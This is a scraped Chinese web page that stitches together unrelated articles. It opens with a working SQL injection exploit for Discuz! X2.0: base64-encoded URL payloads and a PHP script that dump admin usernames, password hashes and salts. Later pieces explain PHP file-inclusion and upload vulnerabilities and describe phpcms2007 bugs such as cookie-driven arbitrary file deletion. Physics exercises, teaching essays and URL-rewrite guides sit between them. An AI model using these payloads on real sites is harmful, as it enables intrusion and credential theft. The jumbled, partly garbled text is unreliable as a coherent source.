Discuz! X2.0 SQL注入漏洞 EXP

DZ2.0直接暴管理账号密码（默认前缀的情况下）

/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd

29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl rZSAnYWRtaW58eHx5%3D

base64解码

1′and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)

from pre_common_member where username like ?admin|x|y

如果不是默认前缀

暴前缀EXP

/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1 FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D

———————–

再贴个PHP的EXP

$host=”http://X2.0论坛地址”;

$affuser=”要爆的用户名username”;

echo ?

echo $host.‖forum.php?mod=attachment&findpost=ss&aid=‖;

echo urlencode(base64_encode(“1′and 1=2 union all select 1,TABLE_NAME from INFORMA TION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like ‘%_member|x|y”));

echo ‘”target=”_blank”>爆前缀’;

echo ―
‖;

echo ?

echo $host.‖forum.php?mod=attachment&findpost=ss&aid=‖;

echo urlencode(base64_encode(“1′and 1=2 union all select 1,group_concat(username,0x7C,password,0x7C,salt) from pre_ucenter_members where username like ‘$affuser|x|y”));

echo ‘”target=”_blank”>爆password,salt’;

?>

牛顿第二定律的应用-临界问题(附答案)

例1.如图所示，一质量为M＝5 kg的斜面体放在水平地面上，斜面体与地面的动摩擦因数为μ1＝0.5，斜面高度为h＝0.45 m，斜面体右侧竖直面与小物块的动摩擦因数为μ2＝0.8，小物块的质量为m＝1 kg，起初小物块在斜面的竖直面上的最高点。现在从静止开始在M上作用一水平恒力F，并且同时释放m，取g＝10 m/s2，设小物块与斜面体右侧竖直面间最大静摩擦力等于它们之间的滑动摩擦力，小物块可视为质点。问： (1)要使M、m保持相对静止一起向右做匀加速运动，加速度至少多大？ (2)此过程中水平恒力至少为多少？ 例1解析：(1)以m为研究对象，竖直方向有： mg－F f＝0 水平方向有：F N＝ma 又F f＝μ2F N 得：a＝12.5 m/s2。 (2)以小物块和斜面体为整体作为研究对象，由牛顿第二定律得：F－μ1(M＋m)g＝(M＋m)a 水平恒力至少为：F＝105 N。 答案：(1)12.5 m/s2(2)105 N 例2.如图所示，质量为m的光滑小球，用轻绳连接后，挂在三角劈的顶端，绳与斜面平行，劈置于光滑水平面上，求： （1）劈的加速度至少多大时小球对劈无压力？加速度方向如何？ （2）劈以加速度a1= g/3水平向左加速运动时，绳的拉力多大？ （3）当劈以加速度a3= 2g向左运动时，绳的拉力多大？ 例2解：（1）恰无压力时，对球受力分析，得 （2），对球受力分析，得

（3），对球受力分析，得（无支持力） 练习： 1.如图所示，质量为M的木板上放着质量为m的木块，木块与木板间的动摩擦因数为μ1，木板与水平地面间的动摩擦因数为μ2，求加在木板上的力F为多大时，才能将木板从木块下抽出？（取最大静摩擦力与滑动摩擦力相等） 1解：只有当二者发生相对滑动时，才有可能将M从m下抽出，此时对应的临界状态是：M与m间的摩擦力必定是最大静摩擦力，且m运动的加速度必定是二者共同运动时的最大加速度 隔离受力较简单的物体m，则有：，a m就是系统在此临界状态的加速度 设此时作用于M的力为F min，再取M、m整体为研究对象，则有： F min-μ2(M+m)g=(M+m)a m，故F min=(μ1+μ2)(M+m)g 当F> F min时，才能将M抽出，故F>(μ1+μ2)(M+m)g 2.一条不可伸长的轻绳跨过质量可忽略不计的定滑轮，绳的一端系一质量M=15kg的重物，重物静止于地面上，有一质量m=10kg的猴从绳子另一端沿绳向上爬，如图所示，不计滑轮摩擦，在重物不离开地面条件下，猴子向上爬的最大加速度为（g=10m/s2）（） A．25m/s2 B．5m/s2 C．10m/s2 D．15m/s2 2.分析：当小猴以最大加速度向上爬行时，重物对地压力为零，故小猴对细绳的拉力等于重物的重力，对 小猴受力分析，运用牛顿第二定律求解加速度． 解答：解：小猴以最大加速度向上爬行时，重物对地压力为零，故小猴对细绳的拉力等于重物的重力，即F=Mg； 小猴对细绳的拉力等于细绳对小猴的拉力F′=F； 对小猴受力分析，受重力和拉力，根据牛顿第二定律，有

dedecms全站伪静态的实现方法及注意事项

成都SEO告诉你，用系统自带生成静态的麻烦事情很多，特别是文章多了，更新一点东西之类的就很是麻烦。所以成都SEO建议，大家如果能用伪静态就都用伪静态吧！一劳永逸的事情，以后不用再给大批量的更新而烦恼了。在此分享一下DEDECMS实现频道|列表页|文章页|TAG伪静态的方法，希望朋友们在有需要的时候能用上吧！ 开启伪静态的前提条件 保证你的空间或服务器支持伪静态即URL重写 开启DedeCms伪静态 开启伪静态的方法：后台--》系统--》核心设置找到：是否使用伪静态：选择是确定保存。 栏目和文章发布设置 栏目列表选项：选择使用动态页发布选项：选择仅动态浏览 DEDECMS全站伪静态方法 首页伪静态 把站点根目录下index.html删除，以后不更新主页HTML即可，当然你也可以选择不使用动态首页。 频道、列表、文章伪静态 主要通过修改GetFileName()、GetTypeUrl()这两个函数实现。DedeCms V5.3、DedeCms V5.5和DedeCms V5.6版本，打开/include/channelunit.func.php进行修改。注意：DedeCms V5.7，此文件路径更改了，你打开/include/helpers/channelunit.helper.php即可。 a.将GetFileName()中的如下代码： //动态文章 if($cfg_rewrite == 'Y') { return $GLOBALS["cfg_plus_dir"]."/view-".$aid.'-1.html'; } 替换为 //动态文章 if($cfg_rewrite == 'Y') { return "/archives/view-".$aid.'-1.html'; } 将文章页默认的/plus/view-1-1.html链接格式改为/archives/view-1-1.html，这个随个人喜欢，不作更改也行。 b.将GetTypeUrl()中的如下代码： //动态 $reurl = $GLOBALS['cfg_phpurl']."/list.php?tid=".$typeid; 替换为 //动态 $reurl = "/category/list-".$typeid.".html"; 这步必须修改，即让你的频道或是列表页URL变更为/category/list-1.html形式。 列表分页伪静态 打开/include/arc.listview.class.php，找到获取动态的分页列表GetPageListDM()函数末尾

谈小学数学两极分化现象的成因与解决策略

谈小学数学两极分化现象的成因与解决策略 东华小学王希贤 【内容提要】随着课程改革的不断深入，小学数学教学中两极分化的现象越来越严重，造成这种想象的成因是什么，又有哪些解决的策略，本文将结合自己的教学实际做一些粗浅的分析。 【关键词】两极分化成因解决策略 纵观几年的教学实际，数学科班级之间差距越来越大的问题、班级内两极分化的现象已经越来越突显出来，越到高年级班级之间的差距越大，就拿今年升中考试而言，班级之间的差距最多达到了将近30分。当然，这种差距的形成原因是多方面的，有老师的问题，有学生的问题，也有班级管理的问题等等。这种现象是怎样形成的，怎样才能减少这种现象出现，在这里我想谈结合自己的教学实践谈一下自己的看法： 一、形成两极分化的成因 1、教材因素：新教材在编排时强调不仅要考虑数学自身的特点，更应遵循学生学习数学的心理规律，强调从学生已有的生活经验出发，让学生亲身经历将实际问题抽象成数学模型并进行解释与应用的过程，进而使学生获得对数学理解的同时，在思维能力、情感态度与价值观等多方面得到进步和发展，给人一种耳目一新的感觉，和老教材相比较，死记硬背的东西少了，让学生通过感悟来理解的东西多了，口头叙述的东西少了，思维训练方面的东西多了。例如：新教材取消了各种数量关系的总结，而是通过一系列的相应类型的由易到难的训练让学生去感知；用等式的性质解方程替代了四则运算各部分关系的运用；六年级求“单位1”问题的解答，取消了用算式解答的方法，替代的是用方程解答等。同时在课本的编排方面知识的跳跃性更大了，相应知识的基本练习也少了，例如：六年级的分数乘法，课本省略了混合运算环节，一下子跳到了简便计算，再如，在安排了分数乘法应用题后，省略了连乘连除应用题的训练但又要求学生必须会应用等等，总之，知识的获得都是通过理解、感悟、实践得到的，过去那种通过死记硬背获得知识的情况少了，造成了思维灵活的学生学习兴趣越来越浓，对于理解能力欠缺、基础知识不好学生很难适应，势必造成学习数学的两极分化的现象。 2、学生因素：爱迪生曾说过“成功是1％的灵感加99％的汗水”，他在承认后天

动态、静态、伪静态三种网址模式的优化设置方法

一、静态模式的网址 首先，静态网址具有的绝对优势是其明晰，/product/nokia/n95.html和/about.html可以很容易被理解，从而在搜索结果中可能点击量相对较高。 其次，静态网址未必就是最好的网址形式，上述**址中说到，**址能够告诉Google一些可以识别的参数，而静态网址如果文档布置不够恰当（如：过于扁平化，将HTML文档全放在根目录下）及其他因素，反而不如静态网址为Google提供的参考信息丰富。 最后，樂思蜀觉得Google此文中是否有其隐藏含义？“更新此种类型网址的页面会比较耗费时间，尤其是当信息量增长很快时，因为每一个单独的页面都必须更改编译代码。”虽然所说的是网站，但在Google系统中是否同样存在这样的问题呢？ 二、动态模式的网址 首先是动态页面的优化方法。哪些页面更新最勤快呢?肯定是首页和最新相关类的页面了。而对于首页来说，如果生成静态的话，那么就会产生两个网址，一个是原始网址，一个是生成后的网址。而且原始网址是不可能去掉的，如果把首页生成静态，那么就把整站的权重多分一个页面了，权重低的时候自然不会察觉有什么问题，但是到了一定的权重的时候，这样的区别就很容易显现出来了。所以，首页一般使用动态的比较好，因为用户和蜘蛛都经常性的访问首页，如果首页整天都自动生成静态的话，那么就会让蜘蛛重复的抓取多次，这样就会形成网站有多个快照的情况出现了。而一些相关的首页推荐和自动推荐也应该使用动态的，因为这样可以让用户实时的知道情况，而不会产生缓冲现象。至于优化方法，笔者觉得动态页面的优化更为简单，因为动态页面会自动产生，自然自己无法确定其确定网址，所以，常用的优化方法都适合动态页面的优化。虽然动态页面存在的漏洞风险比较高，但是结合其空间的安全性，这点还可以解决掉的。 三、伪静态模式的网址 伪静态是在静态和**址之间繁衍的一种独特的网址模式，一般要产生伪静态的网址时，需要对**址的重写规则，而搜索引挚不会把伪静态网址当成是独立的HMTL文档，尽管它是以HTML后缀名结尾的，因为伪静态只是让搜索引挚把动态看成静态而已，相对于**址的特殊符号减少。而咱们在对伪静态网址作优化时，需要注意的是，把重心放在去除冗余参数、规范URL、尽可能的避免重复页上，在写伪静态规则时，应保留有价值的参数，不要将有价值的参数全部精简掉，如前面例子中的news.php?lang=cn&class=1&id=2 最好重写为news-cn-class1-id2.html，而不是过份精简重写为news-2.html。所以说，在优化伪静态网址时，需要注意把握好那个度就行了，顺其自然而非是刻意为之才是最好的。（文章转自：长沙网站建设https://www.sodocs.net/doc/4112126180.html, 长沙SEO https://www.sodocs.net/doc/4112126180.html,，转载请注明出处，谢谢）

八年级两极分化的原因及对策

有一句话整个概括初中三年：“初一不分上下，初二两极分化，初三一个天上、一个地下。”用这样的描述对于初中三年来说，确实是再贴切不过了。单从这句话中，我们就会明白初二的重要性。也就是‘初二两极分化’直接造成‘初三一个天上、一个地下’。这样的结果，仅仅是因为初二的知识点更多了、更难了吗？原因主要是： 1、学科增多、难度加大是主要原因。 初二学生成绩分化的原因主要有两个方面。首先是学科增多和难度的加大的缘故，因为上初二后学科中增加了物理，而且数学、英语的难度突然加大，知识点增多，每天老师都会上新课，部分学生就不知该如何复习课程，如何总结规律。其实，学生从小学升到初中（初一），学科一下子增加了许多，很多学生已经明显感觉到学习的困难了，但相对而言，初一的课程比较简单，知识容量小，学生可以靠记忆、套公式来应付，许多问题都不曾暴露。而到了初二，课程增多了，难度加大了，这个阶段，英语词汇量变大、语法增加，数学出现几何的知识，学生的学习更多的要靠理解和转化，因此部分依靠记忆性学习的学生，成绩也必然随之下降。所以八年级是成绩“分化”的问题的暴露期而不是发生期，而这个“暴露”大部分发生在初二第一学期的大考里， 那么，我们应该怎么办？如何防微杜渐，见微知著？ 1、细节决定成败，习惯决定细节：养成一个良好的学习习惯的过程，是训练一个人按规律做事和把握细节的过程，对于学生无论在平时听课学习，还是考试测验中都会大有帮助。另外，从长远上看，初二上能不能养成好习惯，改正坏习惯，会对学生能否在中考减少细节扣分起着决定性的作用。 3、期中和期末考试是强有力的助推器：一谈考试，很多同学就会紧张，实际上是因为我们总是把考试想成一个用来为难自己的障碍，而实际上考试是挑战更是机遇，是获得成就感的主要来源，我们应该充分准备，牢牢把握。初二上学期总体内容还不是最难，借助提前学习打下的基础，只要平时做好同步训练和提高，再多花一点精力复习，在期中考试和期末考试中取得好成绩是没有问题的，这能有效的增加学生的成就感，使学生坚定信念、信心百倍的应对下学期更为严峻的挑战，从而进入良性循环。 3、改善学习方式。肯动脑筋，善于思考，善于提出问题。提出问题，往往是成功的一半。 4、知识面要尽量宽阔。要有大量的课外学习、大量的生活实践作为“背景”。家长要注重孩子的知识积累，为孩子创造课外学习与生活实践的环境和条件。 5、关注学习成绩的“智力含量”。不要只强调学生的成绩分数，而要看成绩是如何得来的。是靠死记硬背，还是明白了道理？是独立思考，还是仅仅模仿而已？是“形象思维”取胜，还是“抽象思维”的结果？需要关注的是学生的学习方式，思维参与的程度。 6、心理愉快，成绩才能提高 学习成绩是综合素质的显现，在这个阶段应该让孩子在心理上平稳地过渡，这样孩子才能平静地学习，把成绩提上来。从前人的经验中总结出，成绩好的学生是因为他们有学习兴趣、自信，以及得到适当的鼓励，这些学生的家庭环境通常都是比较宽松的。因此，进入初中后，家长要帮助孩子慢慢过渡，让孩子相信自己能学得好。此外，知识面广的学生学习方法会比较好，成绩也突出，而这也是家庭氛围可以营造和改变的。如家长关注孩子的课外生活，进行正确的引导，以及举行家庭聚会、郊游等活动，让孩子社会化，从而让孩子达到心理成长——独立，独立的心理意味着思想品质比较好、意志力强、情绪控制好，和懂得承担更多的责任，这样孩子的学习成绩也会跟着提高。 “学习成绩的差距是长期积累的结果”。对于学习基础较差的孩子，家长首先是要让孩子能很愉快地学习，每天进步一点点，哪怕是第一次发言、第一次主动做事等都是进步，不能把孩子和其他优秀的孩子相比，而是要与自己比较，家长要重视的是学习过程，而不要过于重视学习成绩。

PHP文件包含漏洞详解

PHP文件包含漏洞详解(1) 一、什么才是”远程文件包含漏洞”？ 回答是：服务器通过php的特性（函数）去包含任意文件时，由于要包含的这个文件来源过滤不严，从而可以去包含一个恶意文件，而我们可以构造这个恶意文件来达到邪恶的目的。 涉及到的危险函数：include(),require()和include_once(),require_once() Include:包含并运行指定文件，当包含外部文件发生错误时，系统给出警告，但整个php文件继续执行。 Require:跟include唯一不同的是，当产生错误时候，include下面继续运行而require停止运行了。 Include_once:这个函数跟include函数作用几乎相同，只是他在导入函数之前先检测下该文件是否被导入。如果已经执行一遍那么就不重复执行了。 Require_once:这个函数跟require的区别跟上面我所讲的include和include_once是一样的。所以我就不重复了。 php.ini配置文件：allow_url_fopen=off 即不可以包含远程文件。Php4存在远程&本地，php5仅存在本地包含。 二、为什么要包含文件？ 程序员写程序的时候，不喜欢干同样的事情，也不喜欢把同样的代码（比如一些公用的函数）写几次，于是就把需要公用的代码写在一个单独的文件里面，比如 share.php，而后在其它文件进行包含调用。在php里，我们就是使用上面列举的那几个函数来达到这个目的的，它的工作流程：如果你想在 main.php里包含share.php,我将这样写include(“share.php”)就达到目的，然后就可以使用share.php中的函数了，像这个写死需要包含的文件名称的自然没有什么问题，也不会出现漏洞，那么问题到底是出在哪里呢？ 有的时候可能不能确定需要包含哪个文件，比如先来看下面这个文件index.php的代码： if ($_GET[page]) { include $_GET[page]; } else { include ”home.php”; }

nginx伪静态

设为首页 收藏本站 快捷导航 首 页论 坛下 载手 册演 示客 服主机推荐我来出份力分站演示 FineCMS 最新研发动态 通过这个窗口，关注跟踪我们的研发进展我来给官方反馈BUG FineCMS 正式版隆重发布 快速建立网站 帮助网站实现一站式服务 下载 — 安装 — 手册下载 — 帮助中心 模板函数变量 自定义URL 地址详细教程 模板标签介绍 FineCMS 万能标签list 功能介绍表单使用介绍 模型创建指南 推荐虚拟主机 热搜:教程 论 坛 使用交流 使用交流 搞了一下午的nginx 僞靜態，現在還沒搞得 ... 返回列表 电梯直达 楼主hlbejy | |设置 |消息 |提醒 |退出积分: 52 |用户组: 注册会员 请输入搜索内容 帖子搜索 查看: 92|回复: 4 搞了一下午的nginx僞靜態，現在還沒搞得 [复制链接] 古易子 发表于 2012-8-4 19:36:52 |只看该作者 |倒序浏览 這東東，看來要慢慢搞才行。

发消息 分享到: QQ 空间 腾讯微博 腾讯朋友 收藏1 回复 举报 发消息 沙发 回复 举报 6主题0好友 88积分 注册会员 民间偏方 https://www.sodocs.net/doc/4112126180.html, 忠忠美女 https://www.sodocs.net/doc/4112126180.html, “人人为我，我为人人”，人人为FineCMS 出一份力！dayrui 167主题2好友3367积分 管理员 发表于 2012-8-4 20:12:16 |只看该作者 参考zend 框架配置方法 技术上问题或者使用方面不懂的地方（HTML 知识就免了），单击此处QQ 联系我~~ “人人为我，我为人人”，人人为FineCMS 出一份力！

小学数学教学中如何解决“两极分化”问题

小学数学教学中如何解决“两极分化”问题 ——户县北街小学李瑞随着课程改革的深入，不少教师感觉小学生学习上出现了明显的两级分化，而且分化的时间提前，分化的距离变大。教师普遍反映，课改后，一些学生能力上显得更优秀了，一些学生在学习上显得更困难了。尤其是我们在使用苏教版以及人教版教材后，到三年级就明显感觉分化现象更严重了。学生学习上的差异虽然始终是存在的，但分化时间提前，分化距离加大，给我们教师的教学带来了很大的不便。课堂上往往出现好的学生吃不饱，学习困难的学生吃不了。很难提高班级的整体成绩落差，因此两极分化现象是我们需要迫切解决的实际问题。导致小学生两极分化的原因应该是多方面的，有智力因素，但是非智力因素造成的两极分化的比率更大些。为了缩小差距，作为教师我们应该注意做到以下几点： 一、教师不能教死了新教材。对于新教材，教师要努力吃透、悟透，努力领会新教材编排的特点与意图，把握新教材的脉络，能深“潜”进去，更能高“跳”出来，这样便能活用教材，教活教材。而且要注意各个知识点之间的联系，该点到的要点到，该总结归纳的要总结归纳，避免各册教材之间出现知识的盲点。 二、教师要时刻关注班级中的弱势群体，尤其要多关注那些上课容易走神的孩子，多鼓励，多提醒，注意激发他们学习的兴趣，调动他们主动参与课堂学习的热情，多让他们体验到成功的快乐，逐渐形成良好的学习习惯，让每个学生获得实实在在的发展。再者，教师

要不断提高自己课堂教学的水平，关注课堂教学的细节，努力提升课堂调控能力。比如在课堂练习中有效关注反馈信息，关注出现错误的学生，帮助他们分析错误的原因，不让他们在起点处掉队。 三、教师要承认、善待学生间的差异。十个指头也有长短，我们不能硬拿那个短的和长的比，使学生觉得不论我怎么跳也是够不到那个桃子的，并因此失去学习的信心，变得更差。要分层要求，对于那些已经处在下极中的学生多从最基本的问题严格要求，比如基本的计算、概念、简单的应用题等要求他们必须会。夯实基础，避免他们掉队。太难解决的问题对他们可以网开一面。切实提高课堂教学的实效，保障每个孩子得到基本的、正常的、和谐的发展。 四、发挥小组学习的作用。小组合作学习能使学生互相取长补短，缩小两端学生的差距，双方都能获益，尤其对后进生有很大的帮助。在以教师为主体的传统教学中，基础差的学生跟不上，但又不敢问，也没机会问。问题得不到解决，日积月累差距越来越大。假如进行小组合作学习，他们就有可能在自己熟悉的小团体中提出问题，因为小组讨论学习的气氛有助于缓解内心的紧张情绪，使他们敢于提出问题，并且小组的集体智慧有助于问题的解决。同时对提供帮助的同学来说也是一次锻炼。双方都会有合作成功的喜悦感。

文件上传漏洞及解析漏洞总结

文件上传漏洞及解析漏洞总结 文件上传漏洞是指用户上传了一个可执行的脚本文件，并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的，“文件上传”本身没有问题，有问题的是文件上传后，服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全，则会导致严重的后果。 文件上传后导致的常见安全问题一般有: 1)上传文件是Web脚本语言，服务器的Web容器解释并执行了用户上传的脚本，导致代码执行。 2)上传文件是Flash的策略文件crossdomain.xml，黑客用以控制Flash在该域下的行为(其他通过类似方式控制策略文件的情况类似); 3)上传文件是病毒、木马文件，黑客用以诱骗用户或者管理员下载执行。 4)上传文件是钓鱼图片或为包含了脚本的图片，在某些版本的浏览器中会被作为脚本执行，被用于钓鱼和欺诈。 除此之外，还有一些不常见的利用方法，比如将上传文件作为一个入口，溢出服务器的后台处理程序，如图片解析模块;或者上传一个合法的文本文件，其内容包含了PHP脚本，再通过"本地文件包含漏洞(Local File Include)"执行此脚本;等等。 要完成这个攻击，要满足以下几个条件: 首先，上传的文件能够被Web容器解释执行。所以文件上传后所在的目录要是Web容器所覆盖到的路径。 其次，用户能够从Web上访问这个文件。如果文件上传了，但用户无法通过Web访问，或者无法得到Web容器解释这个脚本，那么也不能称之为漏洞。 最后，用户上传的文件若被安全检查、格式化、图片压缩等功能改变了内容，则也可能导致攻击不成功。 一、从FCKEditor文件上传漏洞谈起 FCKEditor是一款非常流行的富文本编辑器，为了方便用户，它带有一个文件上传功能，但是这个功能却出过多次漏洞。 FCKEditor针对ASP/PHP/JSP等环境都有对应的版本，以PHP为例，其文件上传功能在：

如何防止两极分化

如何防止英语学科的两极分化 李佩 “两极分化”指原来合在一起的常常发生冲突的团队或者势力向相反的极端集中。两极分化的应用适用于我们生活的每个角落，而这个词语在英语的教学里也同样体现得淋漓尽致。 英语教师在一线的教学中，往往会体会到学生有这样的学习程：即好奇----感兴趣----失去兴趣----失去信心----厌烦----反感。这种变化过程，实际上是学生学习心理变化的一种正常现象，学生从由一开始对学习英语的好奇心转化为逆反心理。于是，学生在英语学习过程中的两极分化现象日趋明朗化了。何为“ 两极分化” 呢？这“ 两极” 应该是指：优秀生（吃不饱的学生）和学困生（吃不下的学生）。然而形成“ 两极分化” 的现象，不仅是家庭问题、学校教育机构方面的问题，社会方面问题，还有语言环境问题和学生自身的问题等等。学生自身的问题表面上看是学习成绩上两极分化，实际上，两极分化只是现象，不是事实。正如某老师所指出的：“ 后进生的差并不是差在… 不能学' 和… 不愿学' 上，实际上，… 不能学' 和… 不愿学' 只是差的结果，而不是差的所在。其成因与学习能力、学习方法、学习习惯兴趣是有直接联系的。那么到底是什么原因造成英语学习中的两极分化呢？ 首先，英语学科的特殊性造就了学习的两极分化。英语学科的学习是一门语言学习，就像汉语一样，属于语言系统。而中文是我们的母语，但是英语与中文不同，它有属于自己的发音规则、拼写方法、使用习惯，所以，刚接触一门新的学科，尤其是跟语感有关的英语学习，自然感到吃力。。与此同时，对于母语，我们从牙牙学语的时候就开始接触它，所以学起来不费劲。在农村，英语的学习是从三年级才刚刚接触，有的学生领悟力好就是比较有语言天赋，学起来相对容易。因此，对于英语的教学，首先是要激发学生学习英语的兴趣。爱因斯坦有句名言：“兴趣是最好的老师”，心理学家研究也表明：人们对自己感兴趣的事物总是力求探索他，认识他；兴趣是一个人力求知识并趋向某种事物特有的意向，是个体主观能动性的一种体现。而对于一个刚刚上三年级的学生来说，英语基础就是一张白纸。老师只有调动他画画的欲望，才能够真正的让学生在以后的学习中描绘出丰富多彩的图画。

新云NewAsp4程序伪静态规则设置(最新完整版)

################################################### ######################################## ###008博学网规则### ################################################### ######################################## RewriteRule /([A-Za-z0-9_-]+)/(\d+)\.html /$1/show\.asp\?id=$2 [N,I] RewriteRule /([A-Za-z0-9_-]+)/(\d+)_(\d+)\.html /$1/show\.asp\?id=$2&page=$3 [N,I] RewriteRule /([A-Za-z0-9_-]+)/list_(\d+)_(\d+)\.html /$1/list\.asp\?page=$2&classid=$3 [N,I] RewriteRule /([A-Za-z0-9_-]+)/special-(\d+)-(\d+)\.html /$1/special\.asp\?page=$2&specialid=$3 [N,I] RewriteRule /([A-Za-z0-9_-]+)/newlist-(\d+)\.html /$1/shownew\.asp\?page=$2 [N,I] RewriteRule /([A-Za-z0-9_-]+)/bestlist-(\d+)\.html /$1/showbest\.asp\?page=$2 [N,I] RewriteRule /([A-Za-z0-9_-]+)/hotlist-(\d+)\.html /$1/showhot\.asp\?page=$2 [N,I] RewriteRule /([A-Za-z0-9_-]+)/ABC_([A-Za-z0-9_-]+)_1\.html /$1/showabc\.asp\?q=$2 [N,I] RewriteRule /([A-Za-z0-9_-]+)/tag-(.*)-(\d+)\.html /$1/tag\.asp\?name=$2&page=$3 [N,I] RewriteRule /([A-Za-z0-9_-]+)/tag-(\d+)\.html /$1/tag\.asp\?page=$2 [N,I] RewriteRule /([A-Za-z0-9_-]+)/dl(\d+)\.html /$1/softdown\.asp\?softid=$2 [N,I] RewriteRule /([A-Za-z0-9_-]+)/d(\d+)\.html /$1/down\.asp\?id=$2 [N,I] RewriteRule /([A-Za-z0-9_-]+)/type-(.*)-(\d+)\.html /$1/showtype\.asp\?type=$2&page=$3 [N,I] RewriteRule /([A-Za-z0-9_-]+)/comment-(\d+)-(\d+)\.html /$1/comment\.asp\?id=$2&page=$3 [N,I] RewriteRule /([A-Za-z0-9_-]+)/zt(\d+)\.html /$1/downcopy\.asp\?id=$2 [N,I] RewriteRule /([A-Za-z0-9_-]+)/zt-(\d+)\.html /$1/downcopy\.asp\?id=$2 [N,I]

小学数学教学中如何解决两级分化问题

小学数学教学中如何解决两级 分化问题 课堂上往往出现好的学生吃不饱，学习困难的学生吃不了。很难提高班级的整体成绩落差，因此两极分化现象是我们需要迫切解决的实际问题。导致小学生两极分化的原因应该是多方面的，有智力因素，但是非智力因素造成的两极分化的比率更大些。为了缩小差距，作为教师我们应该注意做到以下几点： 一、教师不能教死了新教材。对于新教材，教师要努力吃透、悟透，努力领会新教材编排的特点与意图，把握新教材的脉络，能深“潜”进去，更能高“跳”出来，这样便能活用教材，教活教材。而且要注意各个知识点之间的联系，该点到的要点到，该总结归纳的要总结归纳，避免各册教材之间出现知识的盲点。 二、教师要时刻关注班级中的弱势群体，尤其要多关注那些上课容易走神的孩子，多鼓励，多提醒，注意激发他们学习的兴趣，调动他们主动参与课堂学习的热情，多让他们体验到成功的快乐，逐渐形成良好的学习习惯，让每个学生获得实实在在的发展。再者，教师要不断提高自己课堂教学的水平，关注课堂教学的细节，努力提升课堂调控能力。比如在课堂练习中有效关注反馈信息，关注出现错误的学生，

帮助他们分析错误的原因，不让他们在起点处掉队。 三、教师要承认、善待学生间的差异。十个指头也有长短， 我们不能硬拿那个短的和长的比，使学生觉得不论我怎么跳也是够不到那个桃子的，并因此失去学习的信心，变得更差。要分层要求，对于那些已经处在下极中的学生多从最基本的问题严格要求，比如基本的计算、概念、简单的应用题等要求他们必须会。夯实基础，避免他们掉队。太难解决的问题对他们可以网开一面。切实提高课堂教学的实效，保障每个孩子得到基本的、正常的、和谐的发展。 四、发挥小组学习的作用。小组合作学习能使学生互相取 长补短，缩小两端学生的差距，双方都能获益，尤其对后进生有很大的帮助。在以教师为主体的传统教学中，基础差的学生跟不上，但又不敢问，也没机会问。问题得不到解决，日积月累差距越来越大。假如进行小组合作学习，他们就有可能在自己熟悉的小团体中提出问题，因为小组讨论学习的气氛有助于缓解内心的紧张情绪，使他们敢于提出问题，并且小组的集体智慧有助于问题的解决。同时对提供帮助的同学来说也是一次锻炼。双方都会有合作成功的喜悦感。

挖掘PHP整站程序漏洞的一些思路和经验

挖掘PHP整站程序漏洞的一些思路和经验 （廖坚先）Bykid@广东科干 第一次写稿同时也是第一次投稿，文章写的不好，大家多多包涵；进入正题，今天要跟大家分享的是挖掘PHP整站程序漏洞的一些思路，就拿phpcms2007整站(版本:PHPCMS 2007-更新日期:20080717)来说吧。 先给大家展示我在phpcms2007挖掘到的几个安全漏洞和安全隐患，虽然有的已经在phpcms2008中不存在，但是却可以从中得到一些经验或许这些漏洞在其它整站程序中存在也不稀奇啊，然后呢再引出我是如何快捷的发现它们的，所以重点还在后面，大家要耐心看下去啊。 Bug->1：漏洞出现在安装整站的文件install.php，关键源代码：在217行“file_put_contents(PHPCMS_ROOT.'/data/uninstall/phpcms/phpcms.php',phpcms_encode(serial ize($user),'uninstall'));”和473行“@unlink(PHPCMS_ROOT.'/data/install/phpcms/phpcms.php');”，大家可以按照这个路径去找找看有没有install这个文件夹。答案是没有的，phpcms.php 是在uninstall\phpcms\下面。这里应该是程序员笔误，他应该是想删除217行建立的phpcms.php，此文件的作用是为了最后的安装操作传递用户填的管理员的账号和密码的。账号和密码经过了自写的函数“phpcms_encode”的加密但是可还原，同时这些编码是没有以PHP代码的形式存放的，也就是说我们浏览那个文件就可以看到内容并且通过“include\auth.func.php”里面的“phpcms_decode”函数解密来查看。 Bug->2：漏洞出现在corpandresize\ui.php，关键代码如下： $dirnames=dirname($PHP_QUERYSTRING);//得到url问号后面的参数 $tmp=PHPCMS_ROOT.'/'.str_replace($PHPCMS['siteurl'],'',$dirnames).'/'; $tmp_url=str_replace($PHPCMS['siteurl'],'',$dirnames); if(preg_match("/http:/",$tmp))//重点：只要提交的是外部站点的地址就会执行花括号的代码{ include_once PHPCMS_ROOT."/include/upload.class.php"; $tmp=PHPCMS_ROOT.'/'.$PHPCMS['uploaddir'].'/'.date('Ym').'/'; $tmp_url=$PHPCMS['uploaddir'].'/'.date('Ym'); dir_create($uploaddir); } 我们的目的是利用dir_create($uploaddir)，$uploaddir是未初始化的这样我们可以post这个变量上去，同样也应该是程序员的笔误，按照正常的逻辑$uploaddir这里应该是$tmp来的，这样就让我们有机可乘了(*^__^*)嘻嘻……顾名思义dir_create就是创建文件夹的，这个函数在“include\global.func.php”中被定义，值传递进去后没有什么限制，就不贴代码了。 Bug->3：这个是Oday漏洞来的，phpcms2008SP3-20100125版本中还存在，漏洞出现在“corpandresize\process.php”关键代码： $thumbfile=$_COOKIE['thumbfile']; if($thumbfile)@unlink(TMP_PATH.'/'.$thumbfile); 变量$thumbfile是从cookie中来的，大家可以自由发挥，TMP_PATH这个常量定义在“config.inc.php”里面，其实他也是cookie中传来的变量$tmp，所以$tmp+$thumbfile就可以删掉任何你想要删除的文件了，其实这个图片裁减的这个组件安全问题还是蛮多的。 